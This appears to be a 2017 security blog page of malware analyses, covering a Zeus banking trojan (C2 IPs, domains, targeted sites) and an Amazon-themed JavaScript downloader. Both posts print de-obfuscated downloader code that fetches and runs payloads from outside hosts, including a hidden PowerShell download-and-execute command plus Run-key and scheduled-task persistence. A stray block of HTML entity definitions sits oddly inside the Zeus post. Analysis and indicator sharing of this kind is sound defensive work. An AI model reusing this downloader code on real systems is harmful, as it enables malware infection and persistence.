Friday, April 28, 2017

News: Another Day, Another Obfuscation Technique




SANS ISC:
We got many samples from our readers and we thank them for this. It helps us to find how attackers are improving their techniques to bypass security controls and to fool the victims. Often the provided samples are coming from common "waves" of spam but, sometimes, they are interesting. I'm also collecting pieces of malware via my honeypot and yesterday I detected a Word document with a very low score on VT:

Read the full story here.
Share:

Sunday, April 23, 2017

Malware - Zeus | Apr 2017

Here're some of the characteristics of a current version of the Zeus Banking Malware.

Upon execution, the process that is spawned is explorer.exe which then executes and does the job.


PDB files (from memory, not all are created by the malware):


explorer.pdb
ntdll.pdb
kernel32.pdb
kernelbase.pdb
RSDSqc
apphelp.pdb
msvcrt.pdb
RSDS~S
oleaut32.pdb
RSDSzNh
combase.pdb
RSDS,9%
powrprof.pdb
advapi32.pdb
RSDSGk
user32.pdb
gdi32.pdb
shcore.pdb
RSDSB*
shlwapi.pdb
shell32.pdb
RSDSmEi? r
UxTheme.pdb
dwmapi.pdb
twinapi.pdb
d3d11.pdb
dcomp.pdb
sspicli.pdb
sechost.pdb
userenv.pdb
propsys.pdb
rpcrt4.pdb
SLC.pdb
profapi.pdb
dxgi.pdb
sppc.pdb
imm32.pdb
msctf.pdb
ws2_32.pdb
nsi.pdb
RSDSS=[
dnsapi.pdb
RSDS}=
wininet.pdb
iertutil.pdb
cryptsp.pdb
rsaenh.pdb
bcrypt.pdb
cryptbase.pdb
bcryptprimitives.pdb
secur32.pdb
OnDemandConnRouteHelper.pdb
Kernel.Appcore.pdb
winhttp.pdb
urlmon.pdb
ole32.pdb
RSDS9h
mswsock.pdb
iphlpapi.pdb
RSDSh1
winnsi.pdb
rasadhlp.pdb
RSDSuY
fwpuclnt.pdb
comctl32.pdb

C2 information:


Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E)
HTTP/1.1
Connection: close
urlmon.dll
ObtainUserAgentString
185.121.177.53
185.121.177.177
45.63.25.55
111.67.16.202
142.4.204.111
142.4.205.47
31.3.135.232
62.113.203.55
37.228.151.133
144.76.133.38


HTTP connections:


http://health.worldwidecons.ltd/index.php
Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
health.worldwidecons.ltd
/index.php

health.worldwidecons.ltd
health.worldwidecons.ltd
C:\Windows\System32\rasadhlp.dll
health.worldwidecons.ltd
health.worldwidecons.ltd
LRPC-4ad3f41e1dd17fdfd8
LRPC-4ad3f41e1dd17fdfd8
LRPC-ce28dc8b8c59856b80
Accept: */*
UserName
health.worldwidecons.ltd
Host: health.worldwidecons.ltd
POST /index.php HTTP/1.1
health.worldwidecons.ltd
health.worldwidecons.ltd

http://health.worldwidecons.ltd/index.php
qqqqqqqqqqqqqqqq
health.worldwidecons.ltd
POST /index.php HTTP/1.1
Host: health.worldwidecons.ltd
dtl.snocediwdlrow.htlaeh
health.worldwidecons.ltd
POST /index.php HTTP/1.1
health.worldwidecons.ltd
Host: health.worldwidecons.ltd
health.worldwidecons.ltd
POST /index.php HTTP/1.1
dtl.snocediwdlrow.htlaeh
Host: health.worldwidecons.ltd
POST /index.php HTTP/1.1
POST /index.php HTTP/1.1
health.worldwidecons.ltd
health.worldwidecons.ltd

System info sent back to the C2:


ALLUSERSPROFILE=C:\ProgramData
APPDATA=C:\Users\User\AppData\Roaming
CommonProgramFiles=C:\Program Files\Common Files
COMPUTERNAME=WIN-P63U3EMH5QC
ComSpec=C:\Windows\system32\cmd.exe
FP_NO_HOST_CHECK=NO
HOMEDRIVE=C:
HOMEPATH=\Users\User
LOCALAPPDATA=C:\Users\User\AppData\Local
LOGONSERVER=\\WIN-P63U3EMH5QC
NUMBER_OF_PROCESSORS=1
OS=Windows_NT
Path=C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
PROCESSOR_ARCHITECTURE=x86
PROCESSOR_IDENTIFIER=x86 Family 6 Model 70 Stepping 1, GenuineIntel
PROCESSOR_LEVEL=6
PROCESSOR_REVISION=4601
ProgramData=C:\ProgramData
ProgramFiles=C:\Program Files
PSModulePath=C:\Windows\system32\WindowsPowerShell\v1.0\Modules\
PUBLIC=C:\Users\Public
SESSIONNAME=Console
SystemDrive=C:
SystemRoot=C:\Windows
TEMP=C:\Users\User~1\AppData\Local\Temp
TMP=C:\Users\User~1\AppData\Local\Temp
USERDOMAIN=WIN-P63U3EMH5QC
USERDOMAIN_ROAMINGPROFILE=WIN-P63U3EMH5QC
USERNAME=User
USERPROFILE=C:\Users\User
windir=C:\Windows

Misc information (can be used as IOCs):


Cookie:username@windowssearch.com/
Cookie:username@wireshark.org/

Connection: close
X-Powered-By: PHP/5.4.45-0+deb7u2



<!ENTITY RightTeeArrow "&#x21A6;">
<!ENTITY mapsto "&#x21A6;">
<!ENTITY DownTeeArrow "&#x21A7;">
<!ENTITY mapstodown "&#x21A7;">
<!ENTITY larrhk "&#x21A9;">
<!ENTITY hookleftarrow "&#x21A9;">
<!ENTITY rarrhk "&#x21AA;">
<!ENTITY hookrightarrow "&#x21AA;">
<!ENTITY larrlp "&#x21AB;">
<!ENTITY looparrowleft "&#x21AB;">
<!ENTITY rarrlp "&#x21AC;">
<!ENTITY looparrowright "&#x21AC;">
<!ENTITY harrw "&#x21AD;">
<!ENTITY leftrightsquigarrow "&#x21AD;">
<!ENTITY nharr "&#x21AE;">
<!ENTITY nleftrightarrow "&#x21AE;">


Websites targeted:


The list is very long - they are not leaving any industry out!
Here's just one snippet:


aa.net.nz
aafes.com
abm-energie.de
accretivehealth.com
aceinsurance.com.au
action-inter.com
activedocs.com
aeat.co.uk
afimilk.co.il
aftonxchange.com
agencerecherche.fr
agencywow.com
akd.nl
aksel.com.tr
albil.com.tr
allianz.hr
alturkigroup.net
ana.co.jp
aproposgeschenk.de

Here's one of the downloader de-obfuscated script BTW:

The code below is the part that grabs the payload from the c2 and executes it.
---------------------------
Windows Script Host
---------------------------
var wsh = new ActiveXObject("wscript.shell");

var sh = new ActiveXObject("shell.application");

var HTTP = new ActiveXObject("MSXML2.XMLHTTP");

var Stream = new ActiveXObject("ADODB.Stream");

var path = wsh.SpecialFolders("Templates")+"\\"+((Math.random()*999999)+9999|0)+".exe";

HTTP.Open("GET", "http://forum.glotran.club/rXKAdoWqgi.php", false); HTTP.Send(); if (HTTP.Status == 200) {

Stream.Open(); Stream.Type = 1; Stream.Write(HTTP.ResponseBody);

Stream.Position = 0; Stream.SaveToFile(path, 2);

Stream.Close(); sh.ShellExecute(path, "", "", "open", 1); }
---------------------------


Share:

Thursday, April 20, 2017

Malware - JS Downloaders: Amazon Delivery Theme | APR 2017

This is one of the more interesting JS down-loaders that I've come across recently. The fact that it downloads another script that carries out the final download of the payload is different to what we normally see. As to why exactly it is doing that, not sure. Just an extra layer.
The code in the second download is encrypted by a running XOR and is decrypted on execution. The following shots describe the flow of the campaign.

I've included the text versions of the interesting parts from the scripts, with comments, at the end of the post.

This is a screenshot of the first stage JS code - that, quite literally, downloads another JS file and then executes it to get the payload.

First Stage JS
Below is the 'beautified' version of the same code above.

First Stage Beautified


So below is the output of the selected code that I modified a bit and printed out using the 'console.log' method: 

First Stage Debugging

Executing the modified code gives us the URLs for the second-stage JS script:
First Stage execution results

The downloaded JS is saved in the USER directory and runs it:
Second Stage code

Now we go through the actual code that is executed to download the payload. Things get interesting around here. The actual code is encrypted, using a running XOR - decryption happens on execution. Once de-crypted, the code is executed and the payload is downloaded and executed. Again, I've used the console.log method to print out the de-crypted version of the code and other interesting bits following that. 

Second stage debugging

Below is a screenshot of the de-crypted code after the execution takes place - this is the code that will check a few things on the host system and execute a couple of loops and then eventually download the payload. 

Second Stage Results

Below is the code extracted after de-cryption for the second stage downloader:

Second Stage CODE

Below is the final JS code that will download the payload from the malNet:
Final JS Code


Here is the final JS code with interesting bits in comments:

Snippet #1

var ZGncoNX = new ActiveXObject('WScript.Shell');
var yiwUiaBBet = 600000;
//////CPwSorFGbw9A
//////5f2PK8sWYO22cgXwhsZX
var XvHMKvYV = "http://www.volf.de/term.php";
var xDUceoXahcbBJx0 = ZGncoNX.ExpandEnvironmentStrings('%PROCESSOR_REVISION%');

var xDUceoXahcbBJx1   = "u1"

var xDUceoXahcbBJx2 = ZGncoNX.ExpandEnvironmentStrings('%PROCESSOR_REVISION%%PROCESSOR_ARCHITECTURE%%COMPUTERNAME%%USERNAME%');
//////wK3LkavxMH
//////ffYP3PnSvRGt
WScript.Echo('x2 in this code is =' + xDUceoXahcbBJx2);
xDUceoXahcbBJx2 += xDUceoXahcbBJx;
var xDUceoXahcbBJx3 = "";
//////UP1WM4uKv
//////9SuE9DJo4Ar9knha6L
for (var xDUceoXahcbBJx4 = 0; xDUceoXahcbBJx4 < xDUceoXahcbBJx2.length; xDUceoXahcbBJx4++) {
xDUceoXahcbBJx3 += xDUceoXahcbBJx2.charCodeAt(xDUceoXahcbBJx4).toString(16);
};



/* ---------------------------
 xDUceoXahcbBJx3 - this is the ID that is sent back to the C2:
---------------------------
3436303178383657494e2d5036335533454d4835514356697368616c205468616b7572
---------------------------

 */

Snippet #2

ZGncoNX.Run('REG ADD "HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" /V "' + xDUceoXahcbBJx0 + '0" /t REG_SZ /F /D "cmd.exe /c powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.Webclient).DownloadFile(\'' + XvHMKvYV + '?cmd=d\',\'%userprofile%\\' + xDUceoXahcbBJx0 + '.js\'); %userprofile%\\' + xDUceoXahcbBJx0 + '.js"', 0, false);

/* ---------------------------
ZGncoNX.Run - OUTPUT:
---------------------------
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "46010" /t REG_SZ /F /D "cmd.exe /c powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.Webclient).DownloadFile('http://www.volf.de/term.php?cmd=d','%userprofile%\4601.js'); %userprofile%\4601.js"
---------------------------
 */


Snippet #3

ZGncoNX.Run('REG ADD "HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" /V "' + xDUceoXahcbBJx0 + '1" /t REG_SZ /F /D "%userprofile%\\' + xDUceoXahcbBJx0 + '.js"', 0, false);

/* 
---------------------------
ZGncoNX.Run
---------------------------
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "46011" /t REG_SZ /F /D "%userprofile%\4601.js"
---------------------------
 */

Snippet #4

ZGncoNX.Run('SCHTASKS /Create /TN ' + xDUceoXahcbBJx0 + ' /SC DAILY /F /TR %userprofile%\\' + xDUceoXahcbBJx0 + '.js', 0, false);

/* ---------------------------
ZGncoNX.Run
---------------------------
SCHTASKS /Create /TN 4601 /SC DAILY /F /TR %userprofile%\4601.js
---------------------------
 */

Snippet #5

This one is the XOR encrypted code:
something like this:

xDUceoXahcbBJx5.WriteText('var UDyUWGgURHBZ = "\\x3e\\x17\\x41\\x64\\x1d\\x0f\\x7e\\x45\\x6d\\x20\\x22\\x58\\x2b\\x07\\x3f\\x46\\x64\\x45\\x68\\x13\\x12\\x0c\\.......


Snippet #6

xDUceoXahcbBJx6.open('GET', XvHMKvYV + '?cmd=p&id=' + xDUceoXahcbBJx3 + '&group=' + xDUceoXahcbBJx1 + '&os=' + xDUceoXahcbBJx + '&rnd=' + Math.random(), false);
/* ---------------------------
EndResult:
---------------------------
http://www.volf.de/term.php?cmd=p&id=3436303178383657494e2d5036335533454d4835514356697368616c205468616b7572&group=u1&os=&rnd=0.06770346768653279
---------------------------

 */


That's all. 
:)
Share: